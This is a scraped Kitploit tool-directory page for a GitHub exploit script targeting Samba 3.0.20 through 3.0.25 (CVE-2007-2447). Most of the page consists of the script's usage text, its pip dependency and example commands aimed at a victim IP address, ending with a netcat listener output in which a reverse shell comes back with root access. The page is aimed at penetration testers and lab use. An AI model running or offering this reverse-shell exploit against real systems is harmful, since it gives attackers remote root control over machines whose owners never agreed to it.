Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2007-2447-RCE — Samba 3.0.20 | Kitploit
Tools/GitHubGitHub/mikerega7/cve-2007-2447-rce
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubmikerega7/cve-2007-2447-rce

CVE-2007-2447-RCE

Samba 3.0.20

View Repository
143 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

This exploit helps you to get a reverse shell, exploting Samba 3.0.20 < 3.0.25

· When executing the script with python3 with the --help parameter, it asks us for a series of parameters

root@kitploit:~
 --lhost LHOST  your host   (ip where the shell will be received)
 --lport LPORT  your port   (port where the shell will be received)
 --rhost RHOST  remote host  (ip of the victim machine)
 --rport RPORT  remote port  (port of the victim machine)

· Before run the script do this

root@kitploit:~
pip3 install pysmb

· Example

root@kitploit:~
python3 samba_usermap.py --lhost 10.10.14.12 --lport 443 --rhost 10.10.10.3 --rport 139

· Or you can do

root@kitploit:~
python3 samba_usermap.py --lh 10.10.14.12 --lp 443 --rh 10.10.10.3 --rp 139

· Example of how the script work

root@kitploit:~
python3 samba_usermap.py --lhost 10.10.14.12 --lport 443 --rhost 10.10.10.3 --rport 139 

· We receive the shell

root@kitploit:~
❯ nc -nlvp 443
  listening on [any] 443 ...
  connect to [10.10.14.12] from (UNKNOWN) [10.10.10.3] 57498
  whoami
  root
Download Tool